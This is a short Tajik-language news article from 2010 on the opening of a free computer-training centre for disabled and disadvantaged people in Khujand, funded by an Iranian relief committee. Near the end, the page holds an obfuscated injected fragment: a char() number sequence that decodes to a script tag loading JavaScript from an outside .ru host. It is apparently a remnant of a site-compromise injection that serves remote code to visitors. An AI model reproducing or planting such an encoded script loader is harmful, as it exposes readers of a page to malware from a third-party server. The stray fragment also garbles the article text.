20.05.2010
Ифтитоҳи фаъолияти маркази компютерӣ
Ифтитоҳи фаъолияти маркази компютерӣ
Субҳи имрӯз дар бинои Ҷамъияти маъюбони вилояти Суғд расми кушодашавии Маркази компютерӣ баргузор гардид. Марказ бо иптикори кумитаи имдоди Имом Хумайнии Ҷумҳурии Исломии Эрон ташкил гардид. Маркази мазкур барои омӯзиши компютерии маъюбон, ҳамчунин наврасону ҷавонони бепарастор ва оилаҳои кабизоат пешбинӣ шудааст. Дар марказ 12 компютери заонавӣ назб гардида, омӯзиш ройгон мебошад. Ҳар як давраи омӯзиш 2 моҳ идома карда, баъди хатм сертификат дода мешавад. Дар ҳар як давра омӯзиши 50 нафар дар ду баст пешбинӣ шудааст. Дар он расми ифтитоҳи марказ масъули робитаи байналмиллалии КИИХҶИЭ оғои Муҳаммади Муҳаммадифар ва раиси КИИХҶИЭ дар Ҷумҳурии Тоҷикистон оғои Саидҷавод Разавӣ, ҷонишини раиси шаҳри Хуҷанд Рухсора Каримхӯҷаева иштирок ва суханронӣ намуданд.
Ёдовар мешавем, ки 2 сол ин ҷониб бо ташаббуси КИИХҶИЭ дар шаҳри Хуҷанд курсҳои дӯзардагӣ таъсис дода шуда буд ва то ҳол фаъолият дорад. То имрӯз зиёда аз 1000 нафар духтарони маҳаллӣ соҳиби касби дӯзандагӣ гардидаанд.
Суғд

char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)83099c3643244862166c7ed299da243e.js" type="text/javascript">

ТАВЗЕҲОТ